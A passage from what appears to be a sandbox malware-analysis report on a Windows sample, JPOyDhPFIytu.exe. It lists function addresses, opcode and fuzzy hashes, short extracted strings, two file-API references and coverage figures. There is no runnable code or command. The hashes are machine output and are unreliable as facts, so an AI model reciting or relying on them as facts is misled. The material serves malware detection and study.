Instruction Fuzzy Hash: C6F04F70E0C40A9AEB64FF65CA457FC73A1FB94321F0482B7C50DA31B5CE786A818B40

Function 00007FFB4B3E0C50 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2069723855.00007FFB4B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffb4b3e0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13577a1711a3a40cef9f2812c6a54fe2d1285d5d134da444838e8621892a75ec
Instruction ID: c92dfc9821eca6e8a7464b2cf007ab55ce5615c7992ee88737b95d5192373616
Opcode Fuzzy Hash: 13577a1711a3a40cef9f2812c6a54fe2d1285d5d134da444838e8621892a75ec
Instruction Fuzzy Hash: 2D018B7090E389AFE702EF74C98409CBFB0EF02304F1481E7D144DB2A6D938AA84C741

Function 00007FFB4B3E0BB5 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2069723855.00007FFB4B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffb4b3e0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7989595981c1ca71df758204383800d230170be55bc1cd2a850614b9061402d
Instruction ID: 290d429eb5af8c57bf86115148860f1a8c43e3993fa612383350cd40b14a6ea0
Opcode Fuzzy Hash: c7989595981c1ca71df758204383800d230170be55bc1cd2a850614b9061402d
Instruction Fuzzy Hash: 94F0E560A5D55F8BEA80BB39D9974647F60FF5A214FC544E3D04CCA0A2E94D58898701

Function 00007FFB4B3FC4F3 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2069723855.00007FFB4B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffb4b3f0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cb5b6d72a8cddef0b1f435dabc1d3415ab86078d5b314431ca6f2cb49740b10
Instruction ID: 3bc30010ae2335ecb5ae904cef711e929ab74e14c07b7e8cfeef2b6070422452
Opcode Fuzzy Hash: 5cb5b6d72a8cddef0b1f435dabc1d3415ab86078d5b314431ca6f2cb49740b10
Instruction Fuzzy Hash: CFF01D71D0D51A8BF755BA25C884BA973A1EB50310F5682B6C91ED72E1DE38AE818B80

Function 00007FFB4B3FA603 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2069723855.00007FFB4B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffb4b3f0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4514151880ca95b724bb93086afa480c80ca2970036f94aa67927db0f14b770b
Instruction ID: 411fd3e07164829277f89df05933d5bf4d2ab510941d39243a3139b0a88764f2
Opcode Fuzzy Hash: 4514151880ca95b724bb93086afa480c80ca2970036f94aa67927db0f14b770b
Instruction Fuzzy Hash: 25F01271D0951A8FE755FB25C841AA573A1EB50310F5682B6C81ED72A5DE38A9418740

Function 00007FFB4B7D57D0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2075855391.00007FFB4B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffb4b7d0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b044f4809908432ccbf1d32376cce29b3d625e771d9b666273bce0f22bf086f3
Instruction ID: fac4ce6f9da486f7dc98b1f4af25970304e41a0732be4930618194ec5c913182
Opcode Fuzzy Hash: b044f4809908432ccbf1d32376cce29b3d625e771d9b666273bce0f22bf086f3
Instruction Fuzzy Hash: B7D05E30B10D0D4B9B0CBA3D885D430B3D1EBA92027945269D40AC22A1ED25ECC58785

Function 00007FFB4B3F56A8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2069723855.00007FFB4B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffb4b3f0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff7518dade742a06843fbc201c8a235e4e5b727b788bf9261212c62b2a13ccef
Instruction ID: 597153e4dbaecc0259c5283a3468fbb482ed41c61abaf38698273f8d0f3442d5
Opcode Fuzzy Hash: ff7518dade742a06843fbc201c8a235e4e5b727b788bf9261212c62b2a13ccef
Instruction Fuzzy Hash: 95D05E30B60A094B8B0CB63D8459430F3D2E7AA2067945278940BC2291ED25ECC6CB80

Function 00007FFB4B3E62B7 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2069723855.00007FFB4B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffb4b3e0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0fb15e65cec87878056485ed1b2213fc806e640fadf6f803d0e214d2c0915e0
Instruction ID: 884cd3f33d4a3a36f9ee80470524a8f3b4d06b2a76553930a3d29c869820211b
Opcode Fuzzy Hash: e0fb15e65cec87878056485ed1b2213fc806e640fadf6f803d0e214d2c0915e0
Instruction Fuzzy Hash: B8E01260E0C41767FBA4BA26D9417B96260EF54300F54C0B9EA5E937E1ED3CAE448B05

Function 00007FFB4B3F488A Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2069723855.00007FFB4B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffb4b3f0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be0e8b70956c082c96e32a9fa09cfb23dcda6d073e5cf307aa4a18c8b4f649c7
Instruction ID: a87effd72e583df61e7e47d978d815df20bcfca8827baf782a4cd8d3b5253e20
Opcode Fuzzy Hash: be0e8b70956c082c96e32a9fa09cfb23dcda6d073e5cf307aa4a18c8b4f649c7
Instruction Fuzzy Hash: D7E04F75A0C4568BF751FA2AC6405BA3242EFD4320F148776C11D931A9DD6D75164680

Function 00007FFB4B3E0B95 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2069723855.00007FFB4B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffb4b3e0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20056f28f5c8e8269b0aa9eac1031a2c7cb373701acce21d1f9b336049b5c4e8
Instruction ID: 0ffae004a575b1a45d13e70d37b4df956edad973a84e0160b1ddb1530bef072a
Opcode Fuzzy Hash: 20056f28f5c8e8269b0aa9eac1031a2c7cb373701acce21d1f9b336049b5c4e8
Instruction Fuzzy Hash: 4DD0A73052C94E4FC640BB38C8498147BA0FB0F204BC514E2E40CC7162C50848558740

Function 00007FFB4B3F5418 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2069723855.00007FFB4B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffb4b3f0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d728e8cb87eda2c55d58b719f9996e54308b49c89c47e1962610a0b703ecf409
Instruction ID: 5e828c437644ff63e1aa39c8adbf449bda13b62aee2fa777b88d352e8fab9c81
Opcode Fuzzy Hash: d728e8cb87eda2c55d58b719f9996e54308b49c89c47e1962610a0b703ecf409
Instruction Fuzzy Hash: B9D0C930A649084F8B4CBA3C889D97472D1EBAA216B9580A9D00AC72B1E96AD889C741

Function 00007FFB4B3E06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2069723855.00007FFB4B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffb4b3e0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57a22d854b2bdb77d7db5341b5a060bb046ec3c4a192e7dcd67811875f71178f
Instruction ID: 6de4e15ae7529a62bc3520c77a364ee4b2dbdc7db1745355ad71115aac26a236
Opcode Fuzzy Hash: 57a22d854b2bdb77d7db5341b5a060bb046ec3c4a192e7dcd67811875f71178f
Instruction Fuzzy Hash: 25C08C80D0E40B30B8013FBFE6830ACA100DBC8210FD08073D30C404F1AC0D20C60156

Function 00007FFB4B3F424B Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2069723855.00007FFB4B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffb4b3f0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef89e5ee2ba1f3a6c1b1fe57ff687a95ff0ef8361c88f72c9162f79b26a38891
Instruction ID: feba6c225fabf6d887285f18ae6f215b629489e38d185c2114fc3909fdedc1c7
Opcode Fuzzy Hash: ef89e5ee2ba1f3a6c1b1fe57ff687a95ff0ef8361c88f72c9162f79b26a38891
Instruction Fuzzy Hash: 2CD09EB0D1991F8AEB45EF74C815AFEA6B1FF48304F504179D509B62A6DF3C24018760

Function 00007FFB4B446E8B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2069723855.00007FFB4B442000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffb4b442000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 440d9013d0fc474fbcee96b776276736cc932b2221eafb69be3a62d782068643
Instruction ID: b9555e9ab1b98ba8d7ace9a200bd8a2fd600ff0949371b64a77d68dd77973f79
Opcode Fuzzy Hash: 440d9013d0fc474fbcee96b776276736cc932b2221eafb69be3a62d782068643
Instruction Fuzzy Hash: E8D0C9A0A0E66395FABC7E31C33063E62D18F04300E34C87EC25F418F1CE6DB9226A12

Function 00007FFB4B7D2A9B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2075855391.00007FFB4B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffb4b7d0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0025e0c9a84433086476a92f522167a4c56384c534d2abd46dee9898184eb6dd
Instruction ID: 4aad9da6c8eb09c52048588adc814ecf1128842a8be5c5cd03b0e26462c74e18
Opcode Fuzzy Hash: 0025e0c9a84433086476a92f522167a4c56384c534d2abd46dee9898184eb6dd
Instruction Fuzzy Hash: E9D0C9D0A0EA1385FA787F31C32063A19A98F80780EA0C03DC7AF459F1CD1D7803A60A

Function 00007FFB4B3E06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2069723855.00007FFB4B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffb4b3e0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01db36f640556dd3b2c1f0af412511d565d2f4e19acd1802f9463ff23243fe5b
Instruction ID: 21e2a9b6c1654b13dabfb8b20a624ba2431a86d28f722326f2a215350f94c6fa
Opcode Fuzzy Hash: 01db36f640556dd3b2c1f0af412511d565d2f4e19acd1802f9463ff23243fe5b
Instruction Fuzzy Hash: 3DB01240C5E44F10A8443ABB5A8306470405B48100FC040B1E50C401A5A84D20940252

Function 00007FFB4B3F3020 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2069723855.00007FFB4B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffb4b3f0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae88b871aad1a7760b07d21813558346d0cba30454638df79a32b2bcb49e383d
Instruction ID: 01b25820a8e95460a3f31734eb1540942f15c72e7e9854a4924fc714154346a5
Opcode Fuzzy Hash: ae88b871aad1a7760b07d21813558346d0cba30454638df79a32b2bcb49e383d
Instruction Fuzzy Hash: 5FA00244C9BD0A11980835BF5EC709874515B8D154FC95561E909901D7F98E19F90293

Function 00007FFB4B4463C1 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2069723855.00007FFB4B442000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffb4b442000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71dfe8c5ed17067ef9a1bb7a2edcf79416a834e498445668de4356f59b7ac139
Instruction ID: 0eb7606925f7c5f94ad80f2d174ac6474d34e110896d8c06558fc95c90286e18
Opcode Fuzzy Hash: 71dfe8c5ed17067ef9a1bb7a2edcf79416a834e498445668de4356f59b7ac139
Instruction Fuzzy Hash: DBB01280F0C26353F5683CB0966407C00800B49300F948E71E30BCA1E3DDFC38107A20

Non-executed Functions

Function 00007FFB4B3E09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

c9, xrefs: 00007FFB4B3E0B56
#{9, xrefs: 00007FFB4B3E0B3E
!k9, xrefs: 00007FFB4B3E0B4E
"s9, xrefs: 00007FFB4B3E0B46

Memory Dump Source

Source File: 0000001E.00000002.2069723855.00007FFB4B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffb4b3e0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 178301714a0ef593763c91a31247b32d78c8e235b40d3144985dc883b405eaf6
Instruction ID: 0230f023bb86e29ef7b633635af4b3ad0d517890daefb185c52536e46cf016f6
Opcode Fuzzy Hash: 178301714a0ef593763c91a31247b32d78c8e235b40d3144985dc883b405eaf6
Instruction Fuzzy Hash: C3418087A0F56795E10337BEF0021ED6F69AF81A39B0886F7E54E891938D0C64C782F5

Analysis Process: JPOyDhPFIytu.exePID: 7780, Parent PID: 7756COMMON

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	10%
Signature Coverage:	0%
Total number of Nodes:	10
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFB4B3F08B6 Relevance: 9.5, Strings: 6, Instructions: 2009COMMON

Download Yara Rule

Strings

]IK, xrefs: 00007FFB4B3F135D
@>K, xrefs: 00007FFB4B3F12FA
YIK, xrefs: 00007FFB4B3F1174
`[IK, xrefs: 00007FFB4B3F11A8
PWIK, xrefs: 00007FFB4B3F0B7F
xJIK, xrefs: 00007FFB4B3F09E0

Memory Dump Source

Source File: 00000023.00000002.2148954696.00007FFB4B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffb4b3f0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: @>K$PWIK$`[IK$xJIK$YIK$]IK
API String ID: 0-3067140459
Opcode ID: e13cf70f07f0e8b63ed2ea7bf821fa57a19779e4b9c45ea4ad692d1c927b37d9
Instruction ID: 43d429844842ef3db4f954500ed4885d40a2bbcf0eabf05ff2e48b2cbdd40985
Opcode Fuzzy Hash: e13cf70f07f0e8b63ed2ea7bf821fa57a19779e4b9c45ea4ad692d1c927b37d9
Instruction Fuzzy Hash: 66E2A4B1A1C95A9FEB98FF39C5956A473D2FF94300F1485B9D50DC3296CE34AC828B81

Function 00007FFB4B3F14EA Relevance: 8.9, Strings: 6, Instructions: 1353COMMON

Download Yara Rule

Strings

]IK, xrefs: 00007FFB4B3F135D
@>K, xrefs: 00007FFB4B3F12FA
YIK, xrefs: 00007FFB4B3F1174
`[IK, xrefs: 00007FFB4B3F11A8
PWIK, xrefs: 00007FFB4B3F0B7F
xJIK, xrefs: 00007FFB4B3F09E0

Memory Dump Source

Source File: 00000023.00000002.2148954696.00007FFB4B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffb4b3f0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: @>K$PWIK$`[IK$xJIK$YIK$]IK
API String ID: 0-3067140459
Opcode ID: 3aa8f27bfada57563c378baea4f1a93a83de3ba0de7eff5bbc84ffe9898bc0e9
Instruction ID: de1c83e44018b7cc824ebee614e703edba756b7341f9710efa3b71a9f2977914
Opcode Fuzzy Hash: 3aa8f27bfada57563c378baea4f1a93a83de3ba0de7eff5bbc84ffe9898bc0e9
Instruction Fuzzy Hash: 35A2B2A1A1C95A9BEB98FF39C99567473D2FF94300F1445B9D50DC3293CE38AC868B81

Function 00007FFB4B3F0ECD Relevance: 6.1, Strings: 4, Instructions: 1090COMMON

Download Yara Rule

Strings

]IK, xrefs: 00007FFB4B3F135D
@>K, xrefs: 00007FFB4B3F12FA
YIK, xrefs: 00007FFB4B3F1174
`[IK, xrefs: 00007FFB4B3F11A8

Memory Dump Source

Source File: 00000023.00000002.2148954696.00007FFB4B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffb4b3f0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: @>K$`[IK$YIK$]IK
API String ID: 0-2012002549
Opcode ID: 2c01a709ceb55ac37d2e406f0c805f0592506b3ee62d13e3c2d5a8e64437e3af
Instruction ID: bebf833bc0b561aa3192d869675a4b62978c4abf8b805ce23b7ee244b36c0894
Opcode Fuzzy Hash: 2c01a709ceb55ac37d2e406f0c805f0592506b3ee62d13e3c2d5a8e64437e3af
Instruction Fuzzy Hash: DF72A1A1A1CD5A8FEB98FF39C59576473D2EF94300F1485B9D50DC7296CE38AC828B81

Function 00007FFB4B3E0D48 Relevance: 1.5, Strings: 1, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5[_H, xrefs: 00007FFB4B3E0DF3

Memory Dump Source

Source File: 00000023.00000002.2148954696.00007FFB4B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffb4b3e0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 5[_H
API String ID: 0-3279724263
Opcode ID: f307b0320e70ddb6eaa4d8717ef38e7c90392abe2da743602801e275b30e91ad
Instruction ID: d304390dfdfd796de23822523c64a0e421ca4dbddbd0f99365daf09e68aaeecb
Opcode Fuzzy Hash: f307b0320e70ddb6eaa4d8717ef38e7c90392abe2da743602801e275b30e91ad
Instruction Fuzzy Hash: 1791CEB191CA899FE38ADF78C8A67E97FE1FB95310F5040BBC049D77A2DA7818118750

Function 00007FFB4B3E0E43 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2148954696.00007FFB4B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffb4b3e0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47d1d5cef5b9720b8897239a4be8e85ea945d3e8985a48f3005335b585676dd2
Instruction ID: 7fe806486c734578ff5408dae9c581c0d44d217c50256d873a9a00ee32e6e53e
Opcode Fuzzy Hash: 47d1d5cef5b9720b8897239a4be8e85ea945d3e8985a48f3005335b585676dd2
Instruction Fuzzy Hash: 9051E0B6A18A8D9AE389DF6CC4A57E87FE1EB89311F5001BBC009D7BD2DA7514118750

Function 00007FFB4B7D3150 Relevance: 1.8, Strings: 1, Instructions: 524
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFB4B7D3632

Memory Dump Source

Source File: 00000023.00000002.2155450415.00007FFB4B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffb4b7d0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 2f1090ff08ff536380a002a2f7374a25f4f930db03ad66f7ca3844c0af9d026b
Instruction ID: 2f2a81c7ac002d09e5e9e2b449e364c01127f648209a52c0a9a9036dce0d0545
Opcode Fuzzy Hash: 2f1090ff08ff536380a002a2f7374a25f4f930db03ad66f7ca3844c0af9d026b
Instruction Fuzzy Hash: EB02E6B090DA4A9FE749EF78C5906B8BBA4FF04340F5581B9D54EC76A2CB3CA841CB54

Function 00007FFB4B7D4871 Relevance: 1.8, Strings: 1, Instructions: 516
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8DK, xrefs: 00007FFB4B7D4C04

Memory Dump Source

Source File: 00000023.00000002.2155450415.00007FFB4B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffb4b7d0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 8DK
API String ID: 0-3725973011
Opcode ID: 51cc3b03f25b17836426c20a6e2587c407a289e4f69d58bb3482d0cd6a2359dc
Instruction ID: 346bec3c167d1b101bec83e8766b2f6e3e37008372b2fca3ab3d9df1b64d5614
Opcode Fuzzy Hash: 51cc3b03f25b17836426c20a6e2587c407a289e4f69d58bb3482d0cd6a2359dc
Instruction Fuzzy Hash: 4D02F4B094EA468FE768EF3CC5951B977E5FF44340F50857AC18EC36B2DA28B8418749

Function 00007FFB4B4474D2 Relevance: 1.8, Strings: 1, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFB4B447A22

Memory Dump Source

Source File: 00000023.00000002.2148954696.00007FFB4B442000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffb4b442000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 76044220ee01a385b41899fc2a60b0814a9244b5ed04308f95ceb21d19fb6bdc
Instruction ID: c3533f3006b16bfe3c19d3fe45f9f71cb66ec651d7f984a8976bec847c3597ae
Opcode Fuzzy Hash: 76044220ee01a385b41899fc2a60b0814a9244b5ed04308f95ceb21d19fb6bdc
Instruction Fuzzy Hash: 3102C8B090CA5A9FE74DEF78C5A16B8B7A1FF44300F5481B9C14DD7696CB38A852CB90

Function 00007FFB4B4273B3 Relevance: 1.7, APIs: 1, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000023.00000002.2148954696.00007FFB4B411000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffb4b411000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e97d03a69006d6cd5121983cd916ec900223106fa2216bcda68b1297ffd5eccf
Instruction ID: 4453bb3c71bdcc2c9a4a298197a5e269a8cfd5e7f591f6919d933b7f6c65a892
Opcode Fuzzy Hash: e97d03a69006d6cd5121983cd916ec900223106fa2216bcda68b1297ffd5eccf
Instruction Fuzzy Hash: 8371EF7180E7C85FC7079B78D865AE57FB0EF53220F0942DBD088CB1A3D629691AC762

Function 00007FFB4B425035 Relevance: 1.7, APIs: 1, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileTransactedW.KERNEL32 ref: 00007FFB4B425139

Memory Dump Source

Source File: 00000023.00000002.2148954696.00007FFB4B411000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffb4b411000_JPOyDhPFIytu.jbxd

Similarity

API ID: CreateFileTransacted
String ID:
API String ID: 2149338676-0
Opcode ID: 191bd0192a9f1beb8a8209519b53078e8b489a8aeaab2d7838794a300f1ba70e
Instruction ID: d28ddf2303e94202115b7728e1f7fc6c7d00044ccc6628a5d9096503b58d645f
Opcode Fuzzy Hash: 191bd0192a9f1beb8a8209519b53078e8b489a8aeaab2d7838794a300f1ba70e
Instruction Fuzzy Hash: 33419F7181CB588FDB58EF58D8456AD7BF0FBA9710F04426FE489D3251CA74A8458BC2

Function 00007FFB4B425211 Relevance: 1.6, APIs: 1, Instructions: 137
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNEL32 ref: 00007FFB4B4252E7

Memory Dump Source

Source File: 00000023.00000002.2148954696.00007FFB4B411000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffb4b411000_JPOyDhPFIytu.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 827f9a93143d8ce862ce99dde9e6bad5d8fc38241c835be077683c4be3fd6837
Instruction ID: d4e768149f4595020630498119c030194ffedae993d4570fb919e642f536cee0
Opcode Fuzzy Hash: 827f9a93143d8ce862ce99dde9e6bad5d8fc38241c835be077683c4be3fd6837
Instruction Fuzzy Hash: 8531C07190CA5C8FDB18DF58D8456F9BBE1FBA9311F00826FD049D3292CB74A846CB81

Function 00007FFB4B7D353A Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFB4B7D3632

Memory Dump Source

Source File: 00000023.00000002.2155450415.00007FFB4B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffb4b7d0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 55007b2826e37279e123a97dae8575bbce91b5c52c8239de74253fa1299c3f84
Instruction ID: 455c4f21ab0bb6fe5a9c55d2255daa4c821139e8df033cbbc71e236fdf237e95
Opcode Fuzzy Hash: 55007b2826e37279e123a97dae8575bbce91b5c52c8239de74253fa1299c3f84
Instruction Fuzzy Hash: 8C419EB2D0D64E8FDB49EFB8D5915EDB7B5EF44340F0181BAC10AE72A2DA3C29058B50

Function 00007FFB4B44792A Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFB4B447A22

Memory Dump Source

Source File: 00000023.00000002.2148954696.00007FFB4B442000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffb4b442000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 14045bc7b41ed44c53971a0e47a63723c06b558afcd8a46ec983a8f8586f1bba
Instruction ID: c39565b00847b644a48388cd7692099c781c7b08c57c525c1bce7221eafb8050
Opcode Fuzzy Hash: 14045bc7b41ed44c53971a0e47a63723c06b558afcd8a46ec983a8f8586f1bba
Instruction Fuzzy Hash: 73416DB1E0D55E9FEB49EFA8C4655EDBBB1FF44300F1481BAD109E7292CA382906CB50

Function 00007FFB4B3F3DF9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFB4B3F3E16

Memory Dump Source

Source File: 00000023.00000002.2148954696.00007FFB4B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffb4b3f0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 613fe624e6dd1522cf656b9dfb1acbe99c598e03f940d5d9e762995d6e5e22ec
